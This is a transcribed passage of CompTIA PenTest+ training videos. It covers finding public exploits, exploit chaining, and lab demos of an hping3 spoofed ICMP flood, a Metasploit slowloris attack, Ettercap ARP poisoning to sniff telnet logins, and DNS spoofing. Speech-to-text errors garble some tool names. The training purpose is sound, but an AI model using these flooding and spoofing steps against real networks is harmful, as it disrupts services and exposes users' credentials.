I have Google. You ever hear someone say, let me Google that for you, right? That's always a fun thing to do. Don't ask me the question. Ask Google. Google's actually a really good search engine for finding things. And there it is, Google. So what do we do? How does this work, right? Let's say Dalibar exploits, right? So let's just take this file that popped up. And you can start looking. Privilege escalation of Dalibar CRM. We've got exploit DB pops up. Volmon.com. So maybe you can find some more of the more esoteric areas of the internet that have some sort of POC, which is a proof of concept code, publicly available code for trying to exploit this vulnerability. Google does a great job. And ultimately, a lot of times, we're going to take you to our next stop on the shopping list here, which is GitHub. Lots of people write exploits, and they put them in GitHub. Believe it or not, how about that? You can look for things like, let's do eternal blue, eternal, there we go, blue. Make this like a light over my shoulder, making it feel. Oh, look at that. Yeah. We got one. There you go. You download this. Actually, this thing is the Metasploit module, but there it is. There's the Metasploit module. There's the Metasploit code for the module that makes eternal blue happen inside the Metasploit framework, right? That might not be the only thing. And honestly, you could build your own exploit based off of looking at this code and going, I see what you did there. I like that. That's nice. Let me just snatch a little bit of this, a little bit of that, make it a little more one-size-fits-one for me. I don't want to necessarily use Metasploit. There you go. You make your own. Nice stuff.
We also have the exploit chaining.
Exploit chaining. Yeah. This is not a website, it's not a resource, this is an idea. And what this idea is, okay, so I've been on these different little sites here, all well and good. Okay, I tried an exploit and it kind of worked, but it's not fully. A lot of times when you find yourself on a system, you're going to have to work your way through multiple exploits before you actually gain entrance into the system. So one thing might say, oh, there's an authorization bypass to this web application. So now I found myself inside the web application. From there, I was able to discover a file upload vulnerability, which allowed me to upload my own PHP code, but I ended up having to use some sort of PHP filtering mechanism, basically foreign code. Right? You're constantly chaining different vulnerabilities together so that it ultimately culminates in your access to the system because you're constantly hitting roadblocks. So don't think that. Well, sometimes it happens where, I found this, I run it, I'm in. That does occur. But a lot of times, you're going to find that you need another exploit because you're now in this system. And maybe I found myself through a WordPress site, and now there's a plugin that's vulnerable that allows me to do, but I had to have this kind of privileges, so I'm looking for that. Now I'm able to upload. You get the idea. Right? It could be a step-by-step kind of walkthrough of multiple vulnerabilities. This is the idea behind vulnerability chaining and putting these things together, exploit chaining, so that you can find yourself in the system at large. Just want to make sure to bring that up. We're talking about exploits and vulnerabilities and how that works. Seem to be apropos for this conversation. And now you understand that you might not just be a one-size-fits-all. You might need a couple things to get to the mountaintop.
All right, well, that's plenty of different things for us to at least think about and consider, and actually hopefully find useful in terms of resources. Daniel did reveal to us that there are many different ways that we can see application vulnerabilities. Make sure you take a look at those, as well as try your hand at a few of those different exploit resources that are out there, and learn a little bit as you actually go along. Well, that will do it for this episode, but there's plenty more PenTest Plus to come, so make sure you stay tuned right here for the very next episode.
Thank you for watching IT.
That's right, I finally get to use the favorite line I've been waiting to say. No soup for you.
No soup for you.
That's right. A denial of service can be something just as simple where you can't get what it is that you're actually wanting, but the very fact is, as a penetration tester, we do need to know about these different types of attacks, and something that maybe somebody just jumping in may not understand. There's actually multiple types of denial of service attacks. So Daniel, you can help us actually understand that a little bit better, because when I hear denial of service, okay, makes sense, but there's distributed, there's reflected, there's amplified, there's sounds like a lot.
Yeah, it's a bit. It's a little bit. But we are going to go through all those different topics and pieces of conversation. We're going to have a little bit of fun today, by God, if we can, right? Because we're going to be denying some service, and who doesn't like doing that, right? It's going to be a good topic of conversation for us. But you do, like Ryan said, you need to understand this as a penetration tester. Maybe your clients will have the risk appetite for what known as stress assessment or stress testing, better known as denial of service. Can they withstand that? A lot of them do, but every now and then they'll say, yeah, go ahead, see if you can bring us to our knee, cripple us, if you will. Again, probably not a lot of that happening, but you may run into it from time to time. Plus, you know, for the exam, that's what's important. So we'll give you the things you need for the exam, plus some stuff. We're going to actually see this. How's it work? Is it going to actually slow the computer down and keep us from using it? I don't know. We'll see.
So let's start with the really basic then. What is a denial of service attack and a distributed denial of service attack?
All right, so denial of service attack is pretty straightforward, right? This is kind of self-explanatory. We are denying some type of service to legitimate users. So we have a web service, and if we can get to it, then we have denied them service. An FTP site, no one can upload or download files, denial of service, right? So you start to get the idea. Distributed denial of service is a little bit different. Whereas in a denial of service attack, it is just the attacker doing their level best to cripple your infrastructure in some way. A distributed denial of service attack is where we gather all our friends and we join a club and pay dues and meet on Thursdays to go, we're going to bring that service to its knees because there's strength in numbers. So that's really, I think, the best definition for a distributed denial of service is there's more strength in numbers. You're more effective when you have multiple devices lobbing the attack at your intended target than you do with just a single.
Now, the idea here actually sounds more descriptive. In other words, denial of service, distributed denial of service sounds like a description rather than a particular real attack. So it's not real technology based. It's anything that we can do that essentially denies service.
Yeah, exactly. I mean, literally anything you can do. And that does bring us into the idea that there are different ways in which this can be done, and some might be more beneficial than others depending on your given scenario. Obviously, that is going to be specific to whatever it is you're doing at that current point in time. So let's get into a couple that are really common. What we're kind of going from the general, we're kind of whittling it down just a little bit farther. We talk about reflective and amplified attacks, or amplification attacks.
Now, this sounds like it's actually more technical then. So no longer just the idea of denial of service, but reflected sounds like a technical term and the idea of the amplification as well. So help us with nuances here.
Ronnie, you smart enough than me?
Yes,
okay.
Yes, I am.
No, he's absolutely right. This is more getting into that technical aspect of things. Because when we talk about a reflective attack, what we mean is instead of going after my target directly, let's say that you lovely viewer, you're going to be my target today. I'm going to make you the intended victim here. That's a weird word. But anyway, that's going to be the target better, I guess. You're going to be the target. And if I were to attack you straightforward, that's great. It might work and that's fun. But there's also kind of a straightforward path between you and I that says this is where the attack came from, this is where the attack was intended to go. I probably do not want to engage in that. What can be helpful is a reflective attack. We're going to get Ronnie into the mix here, right? I'm going to now actually attack you, but I'm going to make you think it was Ronnie that did it, right? And actually, Ronnie is actually going to do it, which is odd. And so what happens is, let's say that Ronnie is a DNS server. We do DNS queries all the time. So what I do is I tell Ronnie that you really want some DNS information, like a lot, like a ton of stuff, right? He goes, okay, and he sends that information your way. Well, I get him and all his other DNS buddies to do the exact same thing. Now you have a flood of information coming toward you as a response to a query you never made. Isn't denial of service one? This is how it works. So that's reflected, right? I'm reflecting off of Ronnie to you. Okay, so I'm the attacker, but Ronnie's the one sending the information because he set up to send information. That's what he does. Reflect. When you add in the idea of amplification, DNS kind of does help with that analogy as well, because DNS for the query, the information that I'm sending him, typically what's known as called the trigger packet. That information I send him, which is that query, saying, hey, I would love DNS information, right? The payload that's going to be sent to you as my intended target is actually much larger than the query was. So I kind of get more bang for my buck, right? So instead of sending just a simple query to you and trying to bring you to your knees, I get Ronnie to send a much larger payload your way, so that not only are you getting hammered down from Ronnie and all his 10,000 friends, but the information that they're sending to you is a much larger packet of information than what I would have generated just generally, using some sort of packet crafting. Well, I mean, I guess you can weeds with that, but that's a much easier way to go about it. Just get Ronnie and say, hey, here's a request, send that over to my intended target, and he goes, okay, that's all good, because they spook my IP and make me think I'm you. And that's how it works. So there's a reflection that's going on, plus the amplification of the larger payload, and we end up with a lovely denial of service attack.
All right, now along with those, we also have to talk about the idea of some type of a volumetric attack that goes on with this too. Is that a lot different than the amplification that we were just talking about?
So it can, yeah, well, not different, I would say, right? Volumetric is definitely the idea that I'm sending you a large amount of data, okay? So much so, and maybe even bandwidth saturation in that idea as well. So I'm giving you a lot of information that's saturating your network bandwidth and maybe your ability to service those requests. It's just so many of them, it's too much, it's overwhelming, and therefore the service starts to break down, okay? That's the idea behind volumetric. Ping, right? We can ping something. I'm sending information, the information coming back, it's having to service that request, and I'm also taking up bandwidth on the network. If I can ping you enough, maybe we saturate the pipe and your ability to withstand those requests. That could be a great way to do it. If we want to actually engage in this, we can do it with a tool called HPing-free. HPing-free is kind of like ping on steroids, right? It gives you much more capabilities, raw packet, manipulation, all sorts of stuff. Actually, let's take a look at it here. So I'm going to do the old HPing-free-help. And you can see we have plenty of options here for us to be able to work with this tool. And let's see here, what do we got? Let's start at the top here. As you can see, tons of stuff. There we go, at the top. We got version count. So that's an interesting one. Counts how many packets do I wish to send. That could be useful as far as denial of service attack. We have some intervals, like how long should it wait before it sends the next packet. This one right here is one of my favorites. Send packets as fast as possible and don't show the replies. Maybe we'll use that. That's a good one, right? What else do we have? If you have multiple interfaces, you can choose the interface. But then we get down to different modes. We have raw IP, we have ICMP, we have UDP, right? Scan mode. And you give you a simple example using this scan mode for us. We also have spoof, -a or -spoof, spoof the source address. So if I don't want to look like it came from me, hey, weren't we just talking about that? We were. Yeah, how about that? So you have those capabilities as well. Or you can just choose some random destination or random source. Again, to just obfuscate where this came from if you're not really caring, if you don't want some specific source address, then you can just go for random. Anything else? You might want to get into fragmentation if you got behind firewalls, things of that nature. MTU might be a good one for you. Type of service, nice stuff. But really, these ICMP types, right? Because different ICMP types can be, one type might be a block, so use a different type so that it can make it past certain defensive mechanisms. Anyway, let's get into actually using this thing, shall we? Oh, look at that, some flag. Wow, this tool's got it all, right? You want to get into some packet crafting. HPing can allow you to do that. Let's actually lob an attack. So I have a web server running, just running an old version of Multiday. I think this is exploitable too, that I've got fired up. And you can see if I start clicking on things, I can play around with this stuff, have a great time, hands around, go to the vlog, and go to view capture data. You know, things are snappy, things are moving. Let's see if we can slow that down just a little bit, shall we? HPing-free to mess with this thing. So HPing, I'll have to do this. HPing-3 because we will be doing some packet crafting, right? Gotta have that low level of control. And let's do that -- flood option because we like that. I will also do spoof. Why not? Spoof that from 192.168.241. I'll do 130.3. I don't think that's my IP address. I think I'm 131, but there we go. So whatever. It's spoof IP, and I'll do the ICMP method because why not? Sounds good. We're gonna do some pingage, and then my intended target, which is 192.168.241.130. Fire, and forget. Of course, gotta do the old passwordage. All right, it's going. Oh, you want to do? I'm gonna background that. We'll see. Put that in the background. Just use that ampersand, and I'll put that process in the background so I turn it back. Now, that being said, let's do some actual ping. I'm gonna split the screen here. Let me see here. Splits horizontally. There we go. That is not what I intended to do. All right, that's a little crazy. So what we'll do, so why did it do that? Yeah, I'll open another terminal, and we will start pinging. our intended device and just kind of see what's going on. Ping 192.168.241.1.30. Let's get that going. Let's look at these times right here. So these times are below 1 millisecond. So it's still probably pretty snappy, even though we're flooding things out, right? So if I go home, yeah, everything's still kind of popping around pretty well. Let's see if we can slow that down. Let's go back to our other terminal, which was this one. Yep. And we will fire this off again. Excellent. Check the other terminal. It's not what I wanted. Stop doing that. What else? Let's see. Okay, it's starting to slow down a little bit because now you notice we're over a millisecond on average. I've even seen up to 4 milliseconds. There's 6, there's 5. Right? It's starting to bog the machine. Let's see if there's any snappiness. Oh, yeah, that's a little bit slower, right? Yeah, not quite as quick on the draw. Okay, let's try one more time. Let's keep going here. Go to the terminal. Get that. Let's do it again. Yes, more better. Give it. This is. Why do I do it every time, Ronnie? I'm horrible with a mouse. All right, whoa, it's definitely jumped up. Let's see. 18, 12, 15, 21. All right, let's see the snappiness on this thing here. Oh, it's starting to crawl. Still moving. I want to cripple it. I want to hurt it. I want to make it stop. Let's see here. One more time, shall we? This time I will do it right. My goodness. Yes. Definitely getting higher and higher and higher. Let's jump over. Let's see if it's getting kind of. Still not. It still works though. All right, I'm gonna put the hammer down. That is this one. I'm gonna do it 2 more times. Oh, what the heck? Because why not, right? I know we can hurt anything we feel like hurting, right? I swear. One of these days, I'll learn how to use my mouse. Okay, now I'm seeing 37, 47. I bet this does not work as well as it once did. Oh yeah. Oh yeah. That service is slow. That service is real slow at this point in time. So you'll notice these things aren't going as hoped. Now, if I'm an end user, my experience with this website is not all I hoped it would be and more. No, maybe I'll move on to this website's competitor and use their service because it's nice and snappy and quick. Still not moving, by the way. I don't know if you noticed that. We have denied service. We'll probably end up getting some sort of error, the request timeouts, things of that nature. And I can't contact that well enough ultimately in the day. So there you go. There's a denial of service attack. If we're doing a Smurf, Ryan, have you heard of Smurf and Fraggle attack?
I have a little bit.
Because I know running Dabbles in the old network, right? Smurf is the same kind of idea as ICP flood, but instead of going after a specific target, what we do is we kind of use the broadcast address to saturate the network. Because what happens when you contact a broadcast address?
You have to reply.
Yes, you do. Yes, you do. All of them, right? So that's, and then the Fraggle, similar to the Smurf, except it uses UDP instead of ICMP. Targets port 7, which is Echo, and 19, which is the charging ports, instead of what we've been seeing here. I'm gonna go ahead and make this stop hurting this thing for just a hot seconds. Let's see here. Control C that. I don't need that anymore. I can close this terminal. What else do I do? Oh, I got so many of these jobs that are running. Let's see, how many do I have? Looks like I got 7. So let's see here. 4 I in. Let's see here. %1, %2, %3, %4, %5, %6, %7. Let's see here. Just look for here. Do kill $I done. There we go. Jobs. There we go. So now that shall be stopped. And let's see. Did things go back to normal at all? Did it have enough time to become snappy again? Oh, I gotta stop this. This request is going crazy. I just want to check it. Yeah. Look at that. Things are working again. Yay! Because the hammer stopped raining down upon its head. So there you go. There is a volumetric attack. Hard work.
All right. Now we have something called a protocol attack. And the first one that you have listed is like ping of death. It sounds like that's what we did here, didn't it?
Oh, you know what? I could see where you would get that idea. Absolutely, it would seem like that would be the ping of death because we're kind of like pinging the mess out of that machine, and obviously we had a hard time handling all that information. But with the ping of death, this is actually going after the protocol itself, a misconfiguration, an unintended consequence because of just the time and the day when it came out. Ping of death. I think there is new versions of the ping of death, but the tried and true, the venerable old school ping of death was an oversized packet. Ping, you can control it and say, I want to send a packet that's larger than what the receiving device can actually process. So when it would receive that packet and try to actually process the packet, it would crash the machine. So this was a great way to blue screen a Windows machine. Again, giving you a denial of service response. If I'm able to crash the machine, Ronnie, let me just riddle me this one. You tell me if I'm wrong. Crash machines. How well do they respond to further requests?
They don't respond.
They don't respond. That's right. If they're crashed, they're down. They know working, right? So if I can crash the machine, something like ping of death is why we call it protocol-based denial of service because I use the protocol to beat the system in some way, shape, or form into submission and actually crash. There you go. That's what we mean by protocol-based. You can do UDP as well. Like UDP flood, I'm actually manipulating how UDP works the protocol itself by flooding a bunch of UDP requests. Since the way UDP responds, whether the ports open or close, is different and actually has to be serviced by the machine can become overwhelmed trying to service UDP requests to close ports, and therefore making it go, I'm real busy, the machine itself. But it's through that protocol that you're able to do that, hence it falls under the protocol-based denial of service attacks.
All right, so now we have a great example of the volumetric, which you did show us, and we've now gone a little bit into that protocol attack. We also have an application type of attack here. What was that about?
Yeah, so application attacks go after the application layer protocol, or so I think HTTPs, right off the top of my head, right? We actually have seen this accidentally happen. You think about how a website works, right? When I'm clicking those links, I'm seeing how snappy that was. That's using HTTP methods, right? So get requests, if I was adding information and I wanted to give it to the machine and have it processed, that would be like usually after a post request. So these methods are very common. Typically the get request probably being the most common, saying, hey, HTTP server, get me that page and return it to my browser. Cool, I can do that. That's how it works. Pretty simple, straightforward. All right, then, well, what happens if I start to overwhelm that system, right? If I give you a lot of HTTP requests, how can I, what would happen? Do you have the bandwidth to handle that? Do you have enough RAM, enough CPU, enough network, again, going after it in that way through that application layer? Like I said, this exactly happened before with things like when Michael Jackson died, we were searching that, and it was crashing like Twitter and Google. You might have just called the Reddit hug of death, where people start talking about something on Reddit, and then everybody gets excited about it in some way, shape, or form, and everybody's clicking that link on that Reddit thread, and that link starts going, I'm having trouble. Yeah, there's a lot of people asking for this information. Also, before that was called like something about dig effects. That's what they call the dig effects. There's an attack that you can leverage after this, which is super evil. I love it. It's called slow loris. Let me fire up Mesploit real quick. MSF console, because it has a Mesploit module which you can perform this attack. There's a you can go to GitHub or whatever and get this information. There you go, little computer, get to working. And now that it's decided to play nice with us, let's do a search for slow loris. There you go. We have this denial of service attack called slow loris. If I use that, I'm just going to use U0, and I look at the info, it gives us a little more information about what this is. Tries to keep many connections to the target web server open and hold them open for as long as possible. Right? It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to but never completing the request. Oh man. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients. What do you say, Ryan? Shall we do it?
Absolutely.
Why not? Right. So options. Let's take a look. It looks like we only have to add our host. So set our host to 192.168.241.130 is our intended targets, and exploits or run if you're like that. There we go. So creating sockets. I guess I'll just there we go. Saying keep alive. So it looks like it's actually targeting this thing. Let's see if we can go to view captured data. Oh yeah, there it's. I don't know if you can see that over there. Yep. Thinking more, still thinking. Right, yeah, so this is work. Right? Obviously, this website is going. I'm really having a hard time today. Coffee hadn't kicked in. And even if it didn't matter because whole slow loris attack is really kicking my butt. And that was a whole lot easier than using the HP3. Obviously, we're using the web service as an example for both of those, but this is targeted specifically toward doing this, and it was really simple, really easy, and it's super effective.
Yeah, it seems like it's taking an end to three-way handshake where it's never allowing us to complete that. It's finishing anything off.
Oh yeah, fun stuff, huh? Well, there you go. There's a denial of service attacks for us. We have quite a few of them to look over, but you should now be well equipped, hopefully, to understand any denial of service questions you may have in the future.
All right, well, this is a great place for us to also end up reviewing this episode as we take a look at the entirety of denial of service. We did discuss the idea here of denial of service and distributed denial of service, reflection and application attacks, as well as volumetric protocol and application attacks, which we saw, of course, some different demos on that, which were actually great demos for us to go take advantage of as well. But that's not all that there is to, of course, CompTIA's PenTest Plus. You want to join Dan and I in the very next episode, so make sure you click next. That's right. We are jumping into a realm of mystery science. No, not really. We are actually jumping into, of course, the idea of poisoning in pen testing, and those two concepts just heard by themselves don't really sound like they mesh together.
It might seem a little odd.
They do seem a little bit odd, but when it comes to the realm of networking, we start to actually find out that those protocols are so old, and they were built around a time which we really have to worry about a lot of different things, that we can take advantage of that very fact itself. So where are we going to begin when it comes down to the idea of art poisoning and DNF poisoning?
Are we poisoning today? No, we poisoned them yesterday. That's right.
But these are actually these protocols, right? They're very old, and we're actually able to take advantage of the way they actually work. Is how this actually
You nailed it, right? That's exactly right. These protocols, maybe due to their age or just the fact that somebody who had the wherewithal to go, let me look and see how this works. That's typically the impetus for finding new and wondrous vulnerabilities that you can work with. And someone was looking at these protocols going, you know what's weird? Is this just kind of does whatever I tell it. And it does that for the sake of convenience, which makes our lives easy. But as I've always said, and I heard from my old pappy, is the more you secure something, the less easy it is to use. And it's on a bit of a sliding scale. If you make something a little more easy, it's probably going to reduce some sort of security. So that in mind, when we develop these protocols to ease our burden a little bit, we open ourselves up for the possibility of these different types of poisoning attacks we're going to look at today and see, well, how can I leverage that as an attacker to gain some sort of insight into my target.
All right. So when it comes down to it, we're going to begin with this idea of an ARP attack. You can help us understand ARP first, and then we'll take a look at how we can do that.
Yeah, hopefully this is a bit of a review as far as how ARP works. If you've done any kind of basic networking courses, ARP is a great protocol, but it is subject to a type of poisoning attack or spoofing. Some people might call ARP spoofing. There's a myriad of ways of saying I was like poisoning because it really gets the idea of we are doing something nefarious, and it's really interesting. So what do we mean by ARP poisoning, or just ARP in general? What does ARP do? ARP takes your IP address and it maps it to your MAC address. Because unless you're running as a resident network expert for ITProTV, correct me if I'm wrong, you really don't need IP that often if you're working internally.
Right. Yeah, they'll actually work because they're connected to the same switch, and switch knows how to
I mean, IP is nice and everything, but not necessary for us if we're staying inside the Ethernet, right? We're just staying on that level, that layer two, right? Layer two, making around, right? So what's interesting about that though is that there are broadcasts. So when somebody doesn't know where something is, it broadcasts it out. And say, hey, I'm trying to find a resource. Anybody out there know where that is? And if so, could you please turn that back to me? So ARP kind of helps us with this. We can take a look at that. Let's jump on my computer here and we'll use Wireshark to see if we can't find some ARP packets. I'm sure some of them will pop up sooner or later. If not, we'll wait, and then they will, I'm sure. So let's do sudo Wireshark, and I will understand that. Just in case. And while we wait on that, let's jump over into my Windows machine and kind of show you the ARP table. I've got a command prompt open here, and I'm just going to do an ARP-A and show me all the ARP entries in the ARP table. And this is an interesting part of our discussion because you'll notice I have some IP addresses that have been mapped to physical addresses. Hey, look at that. The ARP protocol hard at work. Now over here, we have a little bit difference because we've got a lot of these static ones, but we also have this dynamic one. What does that mean? Well, dynamic ARP is what makes our lives easy, right? Because this machine learned about this IP to MAC mapping through dynamic ARP. It said, hey, what is that information? That machine responded, and it populated the table with that information, right? So you're saying that you're updating the table dynamically, which means on the fly, and you'll receive, and anybody that responds is what you get. And basically the last one in is the one who wins. So I just have to make sure that I overwhelm you with with the information I want, and you'll accept it as true. Yep, that's how that works. Well, I'll be darned. Ain't that gonna be interesting? Let's see if we can see the ARP information. Where are you, Wireshark? Oh, you know why? Because I suited it. And it's waiting for my password. Do FG, there it is. I guess I'm not gonna put it in the background. I'll open another terminal. I always forget to do that. And of course, I always type my password incorrectly. Ryan sits next to me at work, and he always hears me complain about me. Oh, I guess I'll type it again, even though I'm pretty sure I typed it right the first time. All right, so I'll pick my adapter, which is this one, and oh look, right out of the gate, I'm seeing ARP traffic. Now I know it's a little bit of tininess there. We'll get that pulled in a little closer for you folks. And there it is, protocol ARP, right? And we can see this info. Who has 192.168.241.200? We'll tell that to 192.168.241.133. That's what's going on. We can see where that came from. The source was this VMware, and the destination was to the broadcast. Hey, this person does not know where that is. Please help them out. There's ARP. So pretty straightforward as far as the information goes, and what it does is super helpful. We like it, but as you can see, there's a little bit of a problem with that dynamic updating that it can do.
All right, so how can we actually take advantage of the situation we're being presented?
All right, so there's a few tools that can help us do this. Obviously, it would be really hard to do this kind of thing manually. Not that it's impossible, but you're most likely, if you have that kind of wherewithal, you're going to build a tool to do this for you, so you can easily ramp this up. Good news is we're not witness. There are plenty of them. There's BetterCap, there's EtterCap, there's DSniff. I think I got a list of them here. What we got on my list? ARP Spoofing. Thank you, Ronnie. So helpful. And yeah, so any of these tools go to GitHub. I'm sure there's a bunch of them available. But those are probably some of the more popular ones. I'm an EtterCap user because I've been doing this for a little bit, and I've used BetterCap, and it's pretty cool. I just haven't made that investment of I'm going to learn BetterCap and know it like I know EtterCap. So we're going to be using EtterCap for any kind of demonstration.
All right, so with that, do you want to take advantage of that?
Yeah. So why not? We like to see this stuff, right? Let's do it. I'm seeing a bunch of traffic that's going across the screen here on Wireshark. But what we're going to do is first things first. I am going to telnet from this machine into another and see if we can sniff that traffic, right? Because that's ultimately what we're going to be doing. We want to be able to do man in the middle attacks, maybe even some denial service. But if I can go man in the middle, that's great because that gives me access to sensitive information. I can modify and do replay and all sorts of great stuff, right? So I'm going to try telnet. I've got PuTTY. Come here, get this out of the way. I've got PuTTY right here. Fire that up. Put the IP in. 268.241.1. 30 is the IP. Click telnet. Click open. There's my login. MSFadmin is my user, and MSFadmin is my password. I'm successfully logged in. Yay. All right. So I'm going to exit out of that. And let's see if I was able to capture that traffic. Again, I'm seeing a bunch of ARP stuff here, but I do not see telnet traffic at all. Okay, well, that's cool. Now, what can we do? Well, okay, this is where EtterCap's coming in here, so I'm going to kind of just hide that for a hot moment. I'm going to go here and just type in EtterCap. I'm going to go for the graphical, because why not? It's easy. Type in my password, because we are getting at the lower level of the interface. Choose my interface, click check, which means go. And now it is starting up, it's doing things. Starting this unified sniffing, which is, it's looking for information on the network so they can use that, populate some information for me. One of the things I want to do is click this scan for host button at the top. It is right here. Looks like an hourglass, and I'll click on that. You'll see that it's scanning for hosts, and wait for it. 5 hosts were added to the list. So great, that means up here, I should have this host list. I can click on that. I can see the targets that can be helpful for me. All right, so what do I want to do? I want to poison the 2 targets that I want to be the man in the middle for. So that's going to be .130. So I'll click on this, right click, add to target 1, and then I'll click on 33, right click, add to target 2. So now I have my 2 targets ready for the attack. And honestly, you go over to the man in the middle menu and hit ARP poisoning. Fire that off. We're good to go with on this. We don't want to do one-way poisoning, so we're going to click OK. We can see that it is poisoning the ARP victims. Let's jump back over to the Windows machine and take a look at that ARP table again. So let's do an ARP-A, and we can see now we have 2 entries with the same physical address. Interesting, right? So I am .131. That is my actual MAC address for my attacking machine, my calling machine. So notice that .130 also shows the physical address being the same as my attacking machine. If we look up above, you'll notice this was 6D8C before, and now it's 6653. It has changed.
So now when somebody's trying to look for something on 130, the information is actually going to be set to you.
Absolutely. Now, interesting stuff. I will also pass along to doing man in the middle. I want to get through that stuff. Sometimes you say it's an inline attack or whatever. Let's log back in with PuTTY. Put my 192.168.241.130. Click telnet. Click open. MSFadmin with MSFadmin. I'm logged in. Everything seems fine as far as the victim, as it were. Exit out. But now let's go back and let's see that Wireshark capture. What's going on there? If I look at capture, oh, I'm seeing telnet data. Right, you see that right there? That's a telnet, right? Let's do the old right click, follow TCP stream, and you'll notice there's information from that telnet section in there. I should not be able to see that. I should not be able to see that at all. Let me get that out of the way. Let me find some more telnets. I keep alive. We look for the beginning of this packet here. Do the old follow TCP stream. I guess that's all I got. But I do see some of the things that were typed in. and I'm receiving that information when I should not be doing that, successfully sniffing that network. So there you go. I was able to capture that information before. I don't know, maybe I picked the wrong, some wrong stuff there, but normally I'm also able to see the connection being made, everything we saw before. This is a virtual network, so give it a little leeway here for it today. We were seeing that telnet traffic when we were before. That's what it's all about. All right, so EtherCap, I will go ahead and stop when you're ready. Just a little stop button, stop command in the middle, and then we'll re-ARP the targets so that they go back to their normal functionality. There you go. There's a man in the middle tag using ARP poisoning. We successfully saw that ARP table. That's really what was the important part of this. Was that ARP table changed, just like we hoped with that successful ARP cache poisoning.
All right, so that leads us into the DNS poisoning as well. And so you're going to help us out not only with DNS poisoning, but I guess a little bit of review of DNS might be helpful here too.
Yeah, so DNS, same kind of idea, except for DNS, what does it do? It maps IPs to host names. So kind of like moving it up the chain to the next thing, right? IP likes to get mapped to a lot of different things, right? But if I'm able to control that information, then what ends up happening? Well, I can poison you to think that Facebook.com is actually my attacking machine. So when you try to contact Facebook.com, you end up on my attacking machine and not at the actual endpoint which you intended. That's the whole idea behind this, is that if I can poison your DNS, then when you make DNS queries, you will get misinformation. That misinformation will lead you to attack. Maybe me garnering sensitive information, things of that nature, right? So I want to definitely, let's talk about the order of DNS, because this is kind of important. When you make a DNS query, what ends up happening? Like you say, okay, I want to know Facebook.com. Where is that? I don't know that IP. DNS comes to the rescue, right? Well, actually, it doesn't quite get there yet. There's an order of operations in which things go through. It first actually starts off and go, well, am I Facebook.com? I could be it. So let me check and see if that's me. Okay, no, I'm not Facebook.com. So it checks its own hostname, see if that's the case, right? Then it moves into the DNS resolver cache, right? Let me check the cache. Have I visited Facebook.com before? If I have, then I'll use that information and try again. Okay, does that work? If not, then it goes to the host file that's local to that machine. Notice we haven't yet to actually get out of the machine at all and start querying DNS services. We're just looking internally. So it actually gives me a couple opportunities to poison and fake out the machine before it starts talking to any real DNS services, right? And of course, after that host file, it says, oh, well, I guess I don't know about this. I need to ask the DNS server. Who's my DNS server? Okay, there's the DNS server. Ask that, do the query, okay? So that is the order of operations. It's really important for how and where at each one of those steps we could possibly interfere with that process to our own benefit, right? We like that, going our way, so that anytime you type in x, y, or z.com, you actually end up on my attacking machine. So if I can change your host file and put an entry in there that says facebook.com is 192.168.attack.machine, then guess where you're going when you type in facebook.com. You're gonna end up on that, right? So that's really what we're looking at. How can we go after those weak points?
So if we're not able to get access to that host file, because you kind of have to be on that machine to really be able to do that, what are some other tools that we can use to help us here?
Well, guess what? EtherCap comes back. Right? You see why I like EtherCap? Again, EtherCap does all these things too. I'm not disparaging the new kid on the block, as we're again just more comfortable with EtherCap. Play around with both of them. Yeah, build your own labs and have a good time with it. Why not, right? That's how we do these things. All right, since we're already in, actually, I'm gonna close some stuff out, I guess, because I say all this. I'm gonna close out EtherCap. I'm gonna close out Wireshark. Yes, stop and close out saving. And then we'll clear the screen. It's like a clean palette, a clean canvas before we get into these things. I'll bring EtherCap back up though. EtherCap. Get that graphical running. Type in my address. Get that going. All right, start that. We'll do the unified sniffing. We'll do the host search, scanning network, and we've got our host list. Great. Yeah, good to go. Now, before we get too deep in the weeds here, if you want to do DNS poisoning with EtherCap, you got to do some modifications of the old files there. So in here, if I take a look at nano/etsy/eder, and there's an eder.dns file, right? Put that in there, take a look. Yes, I know it's just in readable format, I'm just reading it. Down here at the very bottom, this is an example, by the way, of how you can set this up. And the very top is what is going to be helpful for us, at least in this example, is the format is. So if I want a sample host file for DNS spoof plugin for EtherCap, which is what we're going to use, then I need to set up some fake A records. And you can see it's pretty straightforward. You give it the domain name, you tell it it's an A record, and the host and/or time to live that you wish to use. Okay. I have done that kind of pre-game here. You'll notice I got Facebook and Twitter going on, and you'll notice it is an A record, and let me know that this is the IP to those web servers. Right? Guess what IP that address is? This one. It is Kali, right? So anybody that goes to that should be pinging this machine, right? Or seeing it if you're going to the website, whatever, right? That's what's going on. All right, once you've made that, of course, make sure you save your changes. Exit out here. So that's an important part of that. Anything else I need to do? I think we're good with that. We got the GUI running. Let's go ahead. We scan for hosts. We've done everything. We just need to choose the host that we want to go for. Now, really, I just want to target one machine, which is that Windows machine. But I'm going to go ahead and use this 2.1. I'll put that in target 1. And 133 is going to be target 2. So just right click and add them to the target. Let's see here. Now, this is where we get a little more. I'm going to pull this in a little bit closer here so we can see things well. Got this little 3-dot menu option here. If we go down here, we see plugins. We like plugins. Go manage plugins. Even though load plugins seems to be logically where you would want to go. I know, you'd be wrong because you're wrong because I was wrong when I thought that when I first started learning how to do this. It's manage plugins. And there we go. Now we're looking through here and we have one right here, DNS spoof. And I believe, do right click and load it? Yeah, I think just right click and activates. So now you can see that the activating DNS spoof plugin has been activated. Fire off your ARP poisoning attack. Hit OK. And now let's jump over to this lovely person here, get that terminal back up. Let's do some clearing, because if you want to look at the resolver cache, I know it's CLS, I'm sorry. It's Windows, it's me every time. If you want to look at your DNS cache, you can do an ipconfig/display DNS. We don't see a whole lot of things going on here, no big deal. But if we ping facebook.com, let's see if that happens.
Should we check our table to verify everything actually did work?
Yeah, that's a good idea. Let's give that a roll. Make sure that this ARP poisoning is actually happening, because without that, we're going to have a hard time with the whole DNS poisoning. So let's do what is ARP-8, right? Okay, so we are seeing, so there's my machine, 131.6653. 130 is, that was the old machine, right? We're going after .1, which is ARP poisoning. So that's good. That's actually happening. Maybe, you know what though? I might have set this machine up to use a different DNS server. Let me do ipconfig/, I just have to get the Windows mode in my head. Oh yeah, see, I've got it set to 200. That may be causing our issue. Let's go and we'll restart this attack and see if that fixes anything. So I'm going to stop the attack. Oh man, stop it now. All right, so we got that set up. Let's go back to this host list. Actually, we have a targets area, and we can go to current targets. Booyah. And where's that at? Delete. Excellent. So now we can go back to the host list, find, so 200 isn't there. That's why I don't have that machine turned on.
Okay.
